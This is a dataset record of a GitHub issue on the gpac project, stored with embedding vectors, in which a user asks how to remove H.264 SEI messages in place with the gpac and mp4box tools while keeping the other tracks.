0.0007084663957357407, -0.012313306331634521, 0.0010333172976970673, -0.01871442049741745, 0.03037332370877266, 0.0033190264366567135, 0.01860911399126053, -0.01376502774655819, 0.004494319204241037, -0.011500944383442402, -0.018518852069973946, -0.0037158052437007427, -0.0037891436368227005, 0.003006868762895465, 0.0064274403266608715, 0.006284525152295828, 0.02724422514438629, -0.014171209186315536, 0.007897966541349888, -0.0032588515896350145, -0.01845867745578289, -0.01234339363873005, -0.013193365186452866, -0.003522117156535387, 0.0005500369588844478, 0.020294014364480972, 0.013336281292140484, -0.014562346041202545, 0.004336359910666943, 0.009898784570395947, -0.001865424565039575, 0.013742461800575256, 0.018624158576130867, 0.01189960353076458, -0.0019030339317396283, 0.002831985242664814, -0.00446423189714551, 0.028537986800074577, 0.02080550044775009, 0.011057153344154358, 0.009266947396099567, 0.016698557883501053, -0.0025611978489905596, 0.002696591429412365, 0.024235475808382034, 0.0002743133227340877, -0.01770648919045925, 0.011688990518450737, 0.02155768871307373, 0.004738780204206705, 0.012065084651112556, -0.018443632870912552, 0.011621293611824512, 0.024370869621634483, -0.0005128977354615927, -0.005806886125355959, 0.06468810886144638, -0.01344910915941, -0.020038269460201263, 0.001060584094375372, 0.006009976379573345, -0.008206363767385483, -0.013509283773601055, -0.0023693901021033525, -0.03035827912390232, 0.014712783508002758, 0.0033359506633132696, 0.01982765831053257, -0.0000990771732176654, 0.0034920296166092157, 0.003697000676766038, 0.02107628807425499, 0.0034092890564352274, -0.009906306862831116, 0.012884968891739845, -0.01934625767171383, 0.002487859455868602, -0.015675583854317665, 0.007224759086966515, 0.005836973432451487, 0.0004113524337299168, -0.0038662427105009556, -0.01823301985859871, -0.005712862592190504, -0.0038549599703401327, -0.0034299741964787245, 0.004637234844267368, 0.011485899798572063, -0.00842449814081192, 0.014148643240332603, 0.022114306688308716, 0.006100239232182503, 0.004005397204309702, 0.022475356236100197, 0.008093534968793392, 0.02650708146393299, 0.010335053317248821, -0.019060425460338593, 0.010402750223875046, 0.027545100077986717, 0.011831906624138355, -0.00700286403298378, -0.030960028991103172, 0.011643859557807446, 0.001076568034477532, 0.005622600205242634, -0.0163675956428051, 0.019030338153243065, 0.00009584512008586898, -0.00020532362395897508, 0.029952097684144974, 0.02626638114452362, -0.00019721410353668034, 0.015886196866631508, 0.011809340678155422, 0.0006746180006302893, -0.007160823326557875, 0.005381900351494551, 0.024581480771303177 ]
314
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Hello, - I can remove SEI messages in a H264 bitstream upon extracting it: `gpac -i input.mp4#video rfnalu:nosei @ -o raw.264` - I can also remove SEI messages upon importing a raw stream directly: `mp4box -add raw.264:nosei -new output.mp4` - I can't remove SEI messages upon importing a stream from an existing .mp4 container, with mp4box (I get no errors but `nosei` option is ignored): ``` mp4box -add input.mp4:nosei -new output.mp4 mp4box -add input.mp4#video:nosei -new output.mp4 ``` - I can't remove SEI units in-place by using the "self" mode with mp4box (`nosei `option is not marked with an "S" in the [documentation](https://github.com/gpac/gpac/wiki/mp4box-import-opts), which if I understand correctly means it cannot be used in this mode, but as a side note I can't use "self" mode with any option at all, even with the example in the docs, I always get `[Importer] Cannot load filter for input file "self"`) `mp4box -add self:nosei src.mp4` - I can however remove the SEI upon importing a stream from an existing .mp4 container with gpac: `gpac -i input.mp4#video rfnalu:nosei @ -o output.mp4` How can I remove SEI messages in-place (if even possible)? In the last command how can I apply the rfnalu filter to a video stream but also passthrough/stream-copy all other tracks to the output file? The above only adds the video stream to output.mp4.
Remove SEI messages in-place?
https://api.github.com/repos/gpac/gpac/issues/1699/comments
3
2021-03-04T20:35:49
2021-03-05T13:17:57Z
https://github.com/gpac/gpac/issues/1699
822,485,845
1,699
false
This is a GitHub Issue repo:gpac owner:gpac Title : Remove SEI messages in-place? Issue date: --- start body --- Hello, - I can remove SEI messages in a H264 bitstream upon extracting it: `gpac -i input.mp4#video rfnalu:nosei @ -o raw.264` - I can also remove SEI messages upon importing a raw stream directly: `mp4box -add raw.264:nosei -new output.mp4` - I can't remove SEI messages upon importing a stream from an existing .mp4 container, with mp4box (I get no errors but `nosei` option is ignored): ``` mp4box -add input.mp4:nosei -new output.mp4 mp4box -add input.mp4#video:nosei -new output.mp4 ``` - I can't remove SEI units in-place by using the "self" mode with mp4box (`nosei `option is not marked with an "S" in the [documentation](https://github.com/gpac/gpac/wiki/mp4box-import-opts), which if I understand correctly means it cannot be used in this mode, but as a side note I can't use "self" mode with any option at all, even with the example in the docs, I always get `[Importer] Cannot load filter for input file "self"`) `mp4box -add self:nosei src.mp4` - I can however remove the SEI upon importing a stream from an existing .mp4 container with gpac: `gpac -i input.mp4#video rfnalu:nosei @ -o output.mp4` How can I remove SEI messages in-place (if even possible)? In the last command how can I apply the rfnalu filter to a video stream but also passthrough/stream-copy all other tracks to the output file? The above only adds the video stream to output.mp4. --- end body ---
1,566
[ -0.01710404083132744, 0.03321610763669014, -0.02185349352657795, 0.019163139164447784, -0.009002918377518654, 0.02496468648314476, -0.0045164888724684715, 0.044759079813957214, -0.026347437873482704, 0.018306434154510498, -0.026046838611364365, -0.014864584431052208, 0.021372536197304726, -0.01025791559368372, 0.025190133601427078, 0.023882532492280006, 0.003486939938738942, 0.016653142869472504, -0.005809061229228973, -0.03375718370079994, 0.046502549201250076, -0.012662701308727264, 0.0031562817748636007, 0.007928279228508472, 0.009213336743414402, 0.028481684625148773, -0.0464424304664135, 0.023010797798633575, -0.015631109476089478, -0.008364146575331688, -0.009198307059705257, 0.02966904826462269, -0.01408302877098322, 0.007770465221256018, 0.010325550101697445, 0.01844170317053795, 0.0677548497915268, 0.056722890585660934, -0.0022413358092308044, 0.016833502799272537, -0.021432656794786453, -0.03568101301789284, -0.03982926905155182, 0.034568801522254944, -0.03970903158187866, 0.028722163289785385, -0.004610425792634487, -0.01527039147913456, -0.023912591859698296, -0.010400699451565742, 0.010385669767856598, -0.03589143231511116, -0.012339558452367783, -0.05534014105796814, -0.014428716152906418, -0.015345540829002857, 0.05143236368894577, -0.012091564945876598, -0.024318398907780647, -0.002262001857161522, -0.01860703155398369, 0.019027870148420334, -0.01944870688021183, 0.018065955489873886, 0.007214358076453209, -0.0352301150560379, -0.028015758842229843, 0.02078636921942234, -0.01964409649372101, 0.0172092504799366, -0.04157273843884468, -0.013541951775550842, 0.012685246765613556, -0.007236903067678213, 0.028361445292830467, -0.02105690725147724, 0.06294527649879456, -0.002432967070490122, 0.0069024874828755856, 0.03237443417310715, -0.019403617829084396, 0.029488690197467804, -0.041452500969171524, 0.014165692962706089, 0.0035057272762060165, -0.059398215264081955, -0.0314125195145607, -0.05855654180049896, 0.019794395193457603, 0.00358839170075953, 0.004140741191804409, 0.009115641936659813, 0.039618849754333496, -0.0491778738796711, 0.012151684612035751, 0.016157155856490135, -0.017359549179673195, -0.010904202237725258, -0.033606886863708496, -0.004561578389257193, -0.02179337479174137, -0.007105391472578049, -0.006639464292675257, -0.0033704580273479223, 0.011009410955011845, 0.025220194831490517, 0.016021886840462685, -0.025520792230963707, -0.024318398907780647, 0.13514897227287292, 0.01306850928813219, 0.004847147036343813, -0.01188114657998085, 0.0015941101592034101, 0.0248594768345356, -0.033997662365436554, -0.011114620603621006, -0.03598161041736603, 0.02903779223561287, -0.004775754641741514, -0.016562964767217636, -0.007823069579899311, 0.008860133588314056, 0.020230263471603394, -0.01654793508350849, 0.03889741376042366, -0.00979198794811964, -0.03501969575881958, 0.02188355289399624, -0.009326061233878136, -0.057624686509370804, -0.04166292026638985, 0.020846489816904068, 0.012437253259122372, -0.020230263471603394, 0.014804464764893055, -0.027685100212693214, 0.01808098517358303, -0.03034539520740509, 0.0073082949966192245, -0.039318252354860306, -0.0374244824051857, 0.019493797793984413, -0.011971325613558292, -0.009513935074210167, -0.02286049723625183, 0.01518772728741169, 0.0023653325624763966, -0.04734422639012337, 0.0059518455527722836, -0.009326061233878136, -0.015826499089598656, -0.02059098146855831, 0.011400189250707626, 0.04193345829844475, 0.02993958629667759, 0.0044375816360116005, -0.02245469018816948, -0.013917699456214905, -0.023642053827643394, 0.0016561085358262062, -0.04845643788576126, -0.010287975892424583, 0.011332554742693901, -0.024077920243144035, -0.0116782421246171, -0.00865723006427288, 0.006635706406086683, 0.020771339535713196, 0.024273309856653214, 0.0036541474983096123, 0.0025513276923447847, 0.010641178116202354, -0.020470742136240005, 0.006853640545159578, -0.06081102788448334, 0.040189988911151886, -0.02583642117679119, -0.004640485625714064, -0.014864584431052208, -0.02559594251215458, 0.003956624772399664, -0.01904289983212948, 0.007477381732314825, -0.005444585811346769, -0.010829051956534386, 0.020290382206439972, -0.02496468648314476, 0.0527249351143837, -0.03529023751616478, 0.03207383304834366, 0.03420808166265488, 0.012602581642568111, -0.02054589055478573, 0.02158295549452305, -0.007732890080660582, -0.053356193006038666, -0.05122194439172745, 0.012377133592963219, -0.00244799698702991, 0.005125200375914574, -0.032464612275362015, -0.01085911225527525, -0.004294797778129578, -0.01369976531714201, -0.019869545474648476, -0.0008120849961414933, 0.013549466617405415, -0.002709141932427883, -0.033606886863708496, -0.011317524127662182, -0.029999706894159317, 0.036913465708494186, -0.013842550106346607, 0.008364146575331688, 0.00023190685897134244, -0.013113599270582199, -0.0073082949966192245, -0.021207207813858986, -0.009183276444673538, 0.028421565890312195, -0.023131035268306732, -0.0006660130457021296, -0.03288545086979866, -0.006973879877477884, 0.023942651227116585, 0.008168757893145084, -0.016352545469999313, 0.000284159294096753, 0.0140679981559515, 0.03745454177260399, 0.05344637110829353, -0.0029082882683724165, -0.017389608547091484, 0.008491900749504566, -0.021733254194259644, -0.008980372920632362, -0.0012324529234319925, 0.025145044550299644, -0.0054220412857830524, -0.04731416702270508, 0.037514664232730865, -0.03111192025244236, 0.012527432292699814, 0.0007275417447090149, 0.06042024865746498, 0.02365708351135254, 0.048636797815561295, -0.0027636252343654633, 0.019734276458621025, -0.010438274592161179, -0.0014203267637640238, -0.0057263970375061035, 0.020936669781804085, -0.02930833026766777, 0.006695826072245836, 0.007079089060425758, 0.005985662806779146, -0.04106172174215317, -0.042925432324409485, -0.015916677191853523, 0.0055685825645923615, 0.005286771804094315, -0.026076899841427803, 0.007620166055858135, -0.059999413788318634, 0.0009900955483317375, 0.0014513259520754218, 0.02499474585056305, 0.002153035020455718, -0.00795082375407219, -0.01049087941646576, -0.061803001910448074, 0.05347643047571182, -0.025370493531227112, 0.0018477399135008454, -0.020560920238494873, -0.006380198057740927, 0.005948088131844997, 0.022169122472405434, -0.05765474587678909, -0.006083357147872448, -0.02158295549452305, 0.04241441562771797, -0.012527432292699814, 0.001757560414262116, -0.01209907978773117, 0.0020553406793624163, -0.042865313589572906, 0.03138246014714241, 0.028361445292830467, 0.03450867906212807, -0.03679322823882103, 0.027820369228720665, 0.031562816351652145, 0.013925214298069477, -0.01710404083132744, 0.008672259747982025, -0.0028444109484553337, 0.020771339535713196, -0.021132057532668114, 0.020275352522730827, 0.06051043048501015, 0.01039318460971117, -0.04337633028626442, 0.0203505028039217, -0.014278417453169823, 0.04184327647089958, -0.009280971251428127, -0.021537864580750465, 0.04226411506533623, -0.0472540482878685, -0.014346051961183548, -0.006455347873270512, -0.008221362717449665, 0.00897285807877779, 0.018561942502856255, -0.02980431728065014, -0.042895372956991196, 0.00892025325447321, 0.007090361323207617, 0.012993359938263893, -0.01085911225527525, -0.010603603906929493, -0.007372172549366951, -0.019133079797029495, -0.030736172571778297, -0.008349116891622543, 0.000028313186703599058, -0.004926053807139397, 0.008905223570764065, 0.010122646577656269, 0.0464424304664135, -0.007582590915262699, 0.013173718936741352, -0.0590074397623539, -0.03459886088967323, -0.03330628573894501, -0.006970121990889311, -0.030871441587805748, -0.0030360424425452948, -0.024107979610562325, 0.03622208908200264, -0.01761505752801895, -0.0019191320752725005, -0.006353895645588636, -0.017795417457818985, 0.03132233768701553, 0.041993577033281326, 0.011114620603621006, 0.0008975676028057933, -0.009371151216328144, 0.01278294064104557, -0.001022034091874957, 0.00846935622394085, -0.014579015783965588, -0.0020064932759851217, -0.03895753622055054, 0.010611118748784065, 0.013421712443232536, 0.044067706912755966, -0.04009980708360672, 0.021177146583795547, 0.03402772173285484, -0.0045164888724684715, 0.03775514289736748, -0.04878709837794304, 0.00515526020899415, -0.004689333029091358, -0.0070828464813530445, 0.019027870148420334, -0.0017763478681445122, -0.051342181861400604, -0.025746241211891174, -0.013880124315619469, -0.03252473101019859, 0.043827228248119354, 0.011204800568521023, -0.00657558673992753, 0.01677338220179081, -0.025415582582354546, 0.04346650838851929, 0.011490368284285069, -0.04394746571779251, -0.01717919111251831, 0.02032044157385826, -0.026242228224873543, 0.028120966628193855, -0.043556686490774155, -0.04009980708360672, -0.01901284046471119, 0.011302494443953037, -0.012407192960381508, -0.07040011137723923, -0.05275499448180199, 0.060901205986738205, -0.05975893512368202, -0.03589143231511116, 0.023536844179034233, 0.006861155387014151, 0.02633240818977356, -0.030059825628995895, -0.007511198986321688, 0.030089884996414185, -0.008619654923677444, 0.02733941189944744, -0.014766889624297619, -0.006894972641021013, 0.02496468648314476, 0.012504887767136097, 0.025280313566327095, 0.009701808914542198, 0.003175069112330675, -0.02389756217598915, 0.044097766280174255, 0.016833502799272537, 0.010303005576133728, -0.003907777369022369, 0.008446810767054558, 0.008807528764009476, 0.007913249544799328, 0.003120585810393095, -0.013895154930651188, 0.009498905390501022, 0.03940843045711517, -0.006387712899595499, 0.042053695768117905, 0.02275528758764267, 0.04932817444205284, -0.04037034511566162, 0.01808098517358303, -0.02168816514313221, -0.00398668460547924, -0.024889536201953888, 0.003892747452482581, -0.012685246765613556, -0.008905223570764065, -0.01633751578629017, -0.02556588128209114, -0.007075331639498472, -0.024603968486189842, 0.02657288685441017, -0.0004424430662766099, 0.01767517812550068, 0.0461718924343586, -0.039648909121751785, -0.013346563093364239, -0.02673821523785591, 0.010272945277392864, -0.04061082378029823, -0.006481649819761515, 0.028316356241703033, 0.013143658638000488, 0.011400189250707626, 0.01753990910947323, -0.0282712671905756, -0.004539033863693476, -0.018802421167492867, 0.04755464568734169, 0.005861666053533554, 0.0036691774148494005, 0.037544723600149155, -0.007905734702944756, -0.03294556960463524, 0.0314125195145607, 0.0017462880350649357, -0.029112940654158592, -0.011272435076534748, 0.027219172567129135, 0.004321100190281868, 0.011565517634153366, -0.005662519950419664, 0.02119217813014984, -0.003331004409119487, -0.0029834378510713577, 0.027429591864347458, -0.013579525984823704, -0.029834376648068428, 0.018802421167492867, -0.012737851589918137, 0.0054671308025717735, -0.030991680920124054, 0.006511709652841091, 0.027925578877329826, -0.029022762551903725, -0.01710404083132744, 0.01865212246775627, 0.003002225188538432, 0.0036616625729948282, -0.02720414288341999, 0.03471909835934639, 0.021733254194259644, -0.00476072495803237, -0.010581058450043201, 0.017630087211728096, 0.030420543625950813, 0.0024818144738674164, -0.0006481650052592158, 0.016427695751190186, -0.01091171707957983, 0.005444585811346769, 0.03309587016701698, -0.006109659560024738, -0.026512766256928444, 0.03538041561841965, -0.0161120668053627, -0.016623083502054214, 0.03330628573894501, 0.006748430896550417, -0.0029721653554588556, -0.017705237492918968, -0.0004903509397991002, -0.013602071441709995, -0.03595155104994774, -0.019358528777956963, -0.007616408634930849, -0.010648692958056927, -0.00942375510931015, 0.022439660504460335, 0.01690865308046341, 0.019824454560875893, 0.012474827468395233, -0.02119217813014984, 0.013572011142969131, 0.005891725886613131, 0.0078080398961901665, 0.004204618278890848, -0.022469719871878624, -0.0025982961524277925, 0.0021586711518466473, -0.007845615036785603, -0.017990805208683014, -0.016322486102581024, 0.012918210588395596, 0.014022909104824066, -0.004024259280413389, -0.0248594768345356, 0.002570115029811859, -0.005260469391942024, 0.009694294072687626, -0.034238141030073166, 0.03745454177260399, -0.005448343697935343, -0.001734076184220612, -0.03646256774663925, 0.02051583118736744, -0.015646139159798622, 0.009634174406528473, -0.015262876637279987, -0.0004736770933959633, -0.03057084232568741, 0.013789945282042027, -0.014022909104824066, 0.03411790356040001, -0.005857908632606268, -0.011588063091039658, 0.024468697607517242, 0.03736436367034912, 0.009168246760964394, -0.014977307990193367, -0.008935282938182354, 0.019027870148420334, 0.029218150302767754, -0.008672259747982025, -0.006590616889297962, -0.008942798711359501, -0.002320242812857032, -0.019208228215575218, -0.021237267181277275, -0.0296389888972044, -0.004614183213561773, 0.005391981452703476, -0.007315810304135084, -0.013429227285087109, -0.005861666053533554, 0.013835035264492035, 0.018907630816102028, 0.02188355289399624, -0.006936304736882448, 0.0033347620628774166, 0.005579855293035507, -0.02502480521798134, -0.032434552907943726, 0.004561578389257193, 0.014774404466152191, -0.003937837202101946, -0.006034510210156441, 0.005452101118862629, 0.008251422084867954, -0.0025907813105732203, 0.003885232610628009, 0.011655697599053383, 0.024904565885663033, -0.02720414288341999, 0.019268348813056946, 0.009273456409573555, -0.02412301115691662, 0.006305048707872629, 0.016683204099535942, -0.004219647962599993, -0.02004990354180336, 0.039348311722278595, -0.02128235623240471, -0.022770319133996964, -0.026587916538119316, -0.025641031563282013, -0.009964832104742527, -0.008762439712882042, -0.011843571439385414, 0.016367575153708458, 0.000395709415897727, 0.03339646756649017, 0.05263475701212883, -0.03652269020676613, 0.012903179973363876, 0.0024010285269469023, 0.00920582190155983, 0.007601378485560417, 0.0009778836974874139, -0.003231431357562542, 0.027159051969647408, -0.03709382563829422, 0.06360659003257751, 0.0006646039546467364, 0.02412301115691662, 0.02927827090024948, 0.014376112259924412, -0.011986355297267437, -0.013158689253032207, -0.015886617824435234, -0.010505909100174904, 0.012136654928326607, -0.03652269020676613, -0.03282532840967178, -0.04280519112944603, -0.0031882203184068203, 0.01233204361051321, -0.03913789242506027, -0.0050012036226689816, -0.009513935074210167, 0.0045766085386276245, 0.012940755113959312, -0.019974755123257637, 0.009265941567718983, -0.019508827477693558, 0.012489858083426952, -0.007793009746819735, 0.005463373381644487, -0.00873989425599575, 0.020530860871076584, -0.008544505573809147, -0.00620735390111804, -0.0014362960355356336, 0.029263241216540337, 0.01854691281914711, -0.04692338779568672, 0.02332642488181591, 0.018201224505901337, -0.020500801503658295, -0.00042436018702574074, 0.016803443431854248, 0.004490186460316181, 0.0185769721865654, -0.01734451949596405, -0.0028876219876110554, 0.03207383304834366, -0.009408725425601006, 0.0025569640565663576, -0.012595066800713539, 0.0060720848850905895, 0.024138040840625763, -0.017960745841264725, 0.03210389241576195, -0.013729825615882874, 0.00620735390111804, -0.01603691652417183, -0.011212315410375595, -0.004114438779652119, 0.021808404475450516, -0.02299576625227928, 0.006267473567277193, -0.011422733776271343, -0.02352181449532509, 0.0033967604395002127, -0.026948634535074234, 0.011888661421835423, 0.0017124706646427512, 0.014173207804560661, -0.019523857161402702, -0.035410474985837936, 0.021101998165249825, -0.008183787576854229, 0.008041003718972206, 0.016232306137681007, 0.005008718464523554, 0.0032408249098807573, 0.005279256962239742, 0.028135996311903, 0.024889536201953888, 0.01288063544780016, -0.04061082378029823, 0.025505762547254562, 0.0015152031555771828, -0.034839339554309845, 0.008213847875595093, 0.0069024874828755856, -0.0013292079092934728, -0.008815043605864048, 0.008965343236923218, 0.020996788516640663, 0.00276174652390182, -0.006353895645588636, -0.01049087941646576, 0.023251274600625038, 0.004403764382004738, -0.0014691740507259965, 0.0020760067272931337, -0.03447861969470978, -0.0371539443731308, 0.003919049631804228, 0.021898582577705383, -0.019087988883256912, -0.03171311691403389, -0.02592659927904606, 0.002859440864995122, 0.00678224815055728, 0.011558002792298794, 0.0018111044773831964, 0.0007256629760377109, 0.008980372920632362, -0.007653983309864998, 0.0015086275525391102, 0.047133807092905045, 0.019103018566966057, -0.009446300566196442, 0.0028293810319155455, -0.011640667915344238, -0.016352545469999313, 0.021778343245387077, -0.012895665131509304, -0.017900627106428146, -0.007575076073408127, -0.009776958264410496, 0.002042189473286271, -0.025986719876527786, 0.013233838602900505, -0.0034474863205105066, 0.015691230073571205, -0.029398510232567787, 0.013173718936741352, 0.01617218554019928, 0.012384648434817791, 0.03613191097974777, -0.024874506518244743, -0.021898582577705383, -0.021748283877968788, 0.02469414658844471, -0.029188090935349464, 0.016517873853445053, -0.004415037110447884, 0.01991463452577591, 0.014458776451647282, -0.010806507430970669, -0.007236903067678213, 0.015082517638802528, 0.025084923952817917, -0.02873719297349453, -0.018622063100337982, 0.016427695751190186, -0.02516007423400879, -0.00455406354740262, 0.013594556599855423, -0.03138246014714241, -0.04614183306694031, -0.0021361263934522867, -0.018096014857292175, -0.002573872683569789, -0.0005885150167159736, -0.0264977365732193, -0.03171311691403389, -0.031232159584760666, 0.000017026073692250066, -0.04809572175145149, 0.04496949911117554, 0.009897197596728802, -0.03147263824939728, 0.021673135459423065, 0.01463913545012474, -0.03592149168252945, -0.013451771810650826, 0.024243250489234924, 0.0158415287733078, 0.026512766256928444, -0.02966904826462269, -0.0073082949966192245, -0.014977307990193367, -0.0002815760381054133, -0.015217786654829979, -0.03150269761681557, -0.00952144991606474, 0.004839632194489241, 0.031833354383707047, -0.016051946207880974, -0.03132233768701553, -0.017660148441791534, -0.0036729350686073303, -0.019027870148420334, -0.01067875325679779, -0.008815043605864048, 0.018937690183520317, -0.005384466145187616, 0.00273544411174953, 0.023852471262216568, -0.003473788732662797, 0.0248594768345356, -0.01077644806355238, 0.04457872360944748, -0.019974755123257637, -0.019223257899284363, 0.03763490170240402, -0.02493462525308132, 0.019974755123257637, 0.023807382211089134, -0.03862687572836876, -0.02078636921942234, -0.02586648054420948, -0.0002573872625362128, 0.027850428596138954, 0.027189113199710846, 0.02389756217598915, 0.012474827468395233, 0.02349175326526165, -0.011986355297267437, -0.009371151216328144, -0.04160279780626297, 0.015751348808407784, -0.006158506963402033, -0.012910695746541023, -0.010272945277392864, 0.03351670503616333, -0.04704362899065018, -0.017569968476891518, -0.027294322848320007, -0.02419815957546234, 0.011355099268257618, -0.03234437108039856, -0.02248474955558777, -0.0075074415653944016, -0.002579508814960718, -0.0005622126627713442, 0.004046804271638393, -0.0016786534106358886, 0.022379539906978607, 0.032194074243307114, -0.02753480151295662, -0.014999853447079659, -0.01007755659520626, -0.031021740287542343, 0.002102309139445424, -0.006410257890820503, 0.05062074586749077, 0.014173207804560661, -0.020200202241539955, -0.0018956477288156748, -0.000395709415897727, 0.005023748613893986, 0.0040505616925656796, -0.017870565876364708, 0.0009055522386915982, -0.027309352532029152, -0.046532612293958664, -0.02059098146855831, -0.016247335821390152, -0.02633240818977356, -0.013466802425682545, -0.0003675283514894545, -0.001047397032380104, -0.008664744906127453, -0.0013827519724145532, -0.021943673491477966, -0.0038100830279290676, -0.002220669761300087, 0.002092915354296565, 0.004820844624191523, 0.00598190538585186, -0.004539033863693476, 0.0076878005638718605, -0.05765474587678909, -0.033697064965963364, -0.007278235163539648, 0.012820515781641006, -0.0059330579824745655, -0.03646256774663925, 0.002200003480538726, -0.00036165729397907853, 0.006936304736882448, -0.007988398894667625, -0.04836625978350639, 0.003453122451901436, -0.037484604865312576, -0.006842367816716433, -0.01049087941646576, 0.007740405388176441, -0.002979680197313428, -0.023506784811615944, 0.009318546392023563, 0.008243907243013382, 0.000863280612975359, -0.011430248618125916, 0.011031956411898136, -0.02068115957081318, -0.014045453630387783, -0.013609586283564568, -0.013955274596810341, -0.02703881449997425, -0.013121114112436771, -0.040520645678043365, 0.007278235163539648, 0.019087988883256912, 0.06048037111759186, -0.008875163272023201, -0.021447686478495598, -0.017885597422719002, 0.018005836755037308, -0.003043557284399867, -0.009280971251428127, 0.009183276444673538, 0.0019116171170026064, 0.02392762154340744, 0.016397634521126747, 0.007537501398473978, 0.0012070898665115237, 0.015570989809930325, 0.00598190538585186, 0.016653142869472504, -0.022710198536515236, -0.022364510223269463, -0.0018871934153139591, -0.007248175796121359, -0.00660940445959568, 0.01734451949596405, 0.021101998165249825, -0.003353549400344491, -0.01914810948073864, 0.0035677256528288126, 0.025776300579309464, -0.021372536197304726, -0.0044375816360116005, -0.015067487955093384, -0.02248474955558777, -0.032404493540525436, -0.014857068657875061, -0.03955873101949692, -0.014496351592242718, -0.0020064932759851217, -0.0055685825645923615, -0.03198365494608879, -0.031292278319597244, 0.007905734702944756, 0.024513788521289825, -0.014736829325556755, 0.004832116886973381, 0.00039500489947386086, -0.011452794075012207, -0.005718881729990244, 0.00805603340268135, -0.02736947126686573, 0.02496468648314476, -0.027159051969647408, -0.016427695751190186, -0.011204800568521023, -0.004129468463361263, -0.01164818275719881, 0.009130672551691532, 0.007297022733837366, 0.025009775534272194, -0.004306070040911436, -0.0057865167036652565, -0.014691740274429321, -0.003979169297963381, -0.03225419297814369, -0.03562089428305626, 0.039047714322805405, -0.01146030891686678, 0.009115641936659813, -0.008311541751027107, 0.007601378485560417, 0.0033272469881922007, -0.029729168862104416, -0.015916677191853523, -0.019929664209485054, 0.007638953160494566, 0.028256235644221306, -0.037815261632204056, 0.0316830575466156, -0.01865212246775627, 0.03640244901180267, 0.015826499089598656, -0.021628044545650482, -0.02149277552962303, -0.0009055522386915982, -0.01288063544780016, -0.006748430896550417, -0.0029496203642338514, -0.031532756984233856, -0.012715306133031845, 0.0028857432771474123, 0.008454326540231705, -0.03420808166265488, -0.002282668137922883, 0.006128447130322456, -0.030225155875086784, -0.005207865033298731, 0.004332372453063726, -0.03598161041736603, 0.01627739518880844, 0.009919743053615093, -0.024784326553344727, -0.009386180900037289, 0.011926235631108284, 0.00003284858030383475, -0.04818589985370636, -0.00988968275487423, 0.015150152146816254, 0.014706769958138466, 0.0282712671905756, -0.009867138229310513, 0.003528272034600377, 0.0066169193014502525, 0.021132057532668114, -0.01288063544780016, 0.0009351423941552639, 0.00942375510931015, 0.008679774589836597, -0.005031263455748558, -0.0371539443731308, -0.0023709686938673258, -0.050410326570272446, -0.026347437873482704, -0.007695315405726433, -0.0044563692063093185, 0.008747409097850323, -0.028316356241703033, -0.024183129891753197, -0.01650284416973591, 0.015450750477612019, 0.002091036643832922, 0.0027316866908222437, -0.007375929970294237, 0.02960892952978611, 0.025039834901690483, -0.011287464760243893, 0.06763461232185364, -0.004839632194489241, -0.011873631738126278, -0.007913249544799328, -0.009784473106265068, 0.016021886840462685, 0.01677338220179081, 0.00850693043321371, 0.003041678573936224, -0.0314125195145607, -0.011836056597530842, -0.010475849732756615, -0.022304391488432884, -0.0036203302443027496, -0.006075842306017876, 0.025190133601427078, -0.004103166051208973, -0.007717860396951437, 0.008213847875595093, -0.0012249379651620984, -0.007853129878640175, -0.013820004649460316, -0.004937326535582542, 0.001580958953127265, -0.013421712443232536, -0.03114197961986065, 0.003597785485908389, -0.021132057532668114, 0.006425288040190935, -0.015127607621252537, 0.020726250484585762, 0.0036879649851471186, -0.03625214844942093, 0.005617429967969656, -0.008574564941227436, 0.0016579872462898493, -0.0012606339296326041, 0.004193345550447702, -0.021733254194259644, -0.004373704548925161, 0.002325878944247961, -0.023702172562479973, -0.01717919111251831, 0.020861519500613213, -0.002081642858684063, 0.048005543649196625, 0.012151684612035751, 0.0032539761159569025, -0.008762439712882042, 0.009228366427123547, 0.004460126627236605, 0.023341454565525055, -0.007199328392744064, 0.008875163272023201, -0.017960745841264725, 0.03835633769631386, -0.018396614119410515, 0.016127096489071846, -0.012181744910776615, 0.0028895006980746984, -0.016668174415826797, 0.016292424872517586, -0.008987887762486935, -0.0013902669306844473, 0.029533779248595238, -0.01797577552497387, 0.0042910403572022915, 0.031021740287542343, 0.012301984243094921, 0.00012951558164786547, -0.004163285717368126, 0.0066582513973116875, 0.005065080709755421, 0.009198307059705257, -0.0021173390559852123, -0.007499926723539829, -0.004869692027568817, -0.013106084428727627, 0.03880723565816879, 0.009250911884009838, -0.002322121523320675, 0.02209397219121456, 0.00586542347446084, 0.0003165675443597138, -0.034268200397491455, -0.001825195038691163, 0.006553042214363813, 0.026407556608319283, -0.023146066814661026, -0.006000692956149578, -0.013045964762568474, 0.03204377368092537, 0.020876549184322357, -0.00561367254704237, -0.022845467552542686, 0.018351523205637932, -0.027880487963557243, 0.01603691652417183, 0.02231942117214203, 0.0008144334424287081, 0.006688311230391264, -0.01278294064104557, 0.018832480534911156, -0.0064177727326750755, -0.02302582748234272, 0.007995913736522198, 0.0019520099740475416, 0.02209397219121456, -0.006947577465325594, 0.012384648434817791, -0.026452647522091866, -0.029999706894159317, 0.0021304902620613575, -0.004482671618461609, 0.013406682759523392, 0.0052416822873055935, -0.022514808923006058, 0.006034510210156441, -0.017058951780200005, 0.01814110577106476, 0.04602159559726715, -0.017119070515036583, -0.00979198794811964, -0.027459651231765747, 0.01017525140196085, 0.02810593694448471, 0.012226833961904049, -0.011588063091039658, 0.007214358076453209, -0.0010539726354181767, -0.016953742131590843, 0.01209907978773117, -0.0029514990746974945, -0.010385669767856598, -0.020125053822994232, 0.011490368284285069, -0.01677338220179081, 0.019674155861139297, 0.005106412805616856, -0.008619654923677444, -0.029819346964359283, -0.0070828464813530445, 0.005132715217769146, 0.0013686614111065865, -0.013045964762568474, 0.0035808768589049578, 0.0072819930501282215, 0.023747263476252556, -0.012204289436340332, -0.014654165133833885, -0.004820844624191523, 0.014947248622775078, 0.005850393790751696, 0.0024836931843310595, 0.00489599397405982, -0.024709176272153854, -0.014526410959661007, -0.0009172943537123501, -0.018231283873319626, -0.030871441587805748, 0.017600027844309807, 0.0036860862746834755, -0.002397271106019616, 0.029428569599986076, -0.012745366431772709, -0.023551873862743378, 0.003699237247928977, 0.016097037121653557, 0.005508463364094496, -0.0017801052890717983, 0.02272522822022438, -0.01298584509640932, 0.00660940445959568, 0.02950371988117695, 0.03580125421285629, 0.0024292096495628357, 0.02059098146855831, 0.0161120668053627, -0.006244929041713476, 0.035440534353256226, -0.028286296874284744, 0.017419669777154922, 0.004956113640218973, 0.006305048707872629, -0.02252984046936035, -0.001903162687085569, 